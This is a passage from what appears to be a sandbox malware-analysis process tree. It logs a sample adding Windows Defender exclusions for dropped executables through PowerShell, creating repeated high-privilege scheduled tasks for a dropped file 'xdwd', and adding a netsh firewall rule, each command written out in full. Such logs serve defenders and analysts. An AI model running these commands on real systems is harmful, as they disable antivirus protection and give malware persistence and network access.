- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
6⤵
PID:800

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
7⤵
PID:1132

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
6⤵
PID:4400

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
7⤵
- Scheduled Task/Job: Scheduled Task
PID:1272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
5⤵
PID:552

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
6⤵
PID:1460

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
5⤵
PID:1816

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
6⤵
PID:3624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:244

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:548

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
5⤵
- Scheduled Task/Job: Scheduled Task
PID:1860

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
5⤵
- Scheduled Task/Job: Scheduled Task
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\SYSTEM32\CMD.exe
"CMD" netsh advfirewall firewall add rule name="GQY=qBkLqYW6q/" dir=in action=allow program="C:\Windows\xdwd" enable=yes & exit
3⤵
PID:3468

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
4⤵
PID:2684

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3120

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
4⤵
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2288

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1776

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:2324

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5956

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5044

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1060

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5892

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:2340

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:1320

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2856

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:4804

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:3812

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:2948

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:1892

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:2420

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:2172

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4020

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:4144

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5600

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:684

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:4392

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5964

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:1828

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:996

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:6028

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:2500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5488

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:1708

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:1228

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:2776

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:2672

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:3876

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5660

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:3068

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:968

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:4380

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5656

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5076

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:5804

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2216

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:2940

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:6100

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:2668

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3584

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5600

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:540

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:1392

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:2216

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5948

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5612

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:4580

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5100

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6032

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1828

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:3516

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5940

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5488

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2488

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:3532

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5552

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:2464

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:4932

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:1972

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5640

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:2300

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5936

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5916

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6068

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:1392

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:4760

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5984

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:4528

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5364

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:3464

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5992

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:1448

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6120

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1436

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1920

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:2408

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5072

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:4800

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:3016

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:3488

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6100

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5696

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:3188

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5316

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:3212

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5896

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:1708

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:5964

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1280

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1764

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6092

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5356

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:4976

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5452

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1036

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5176

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4556

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:5876

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:4600

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1660

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6004

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3152

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5284

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6136

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4272

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:2524

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6084

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:3168

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:3420

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2404

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:3784

C:\Windows\system32\cmd.exe
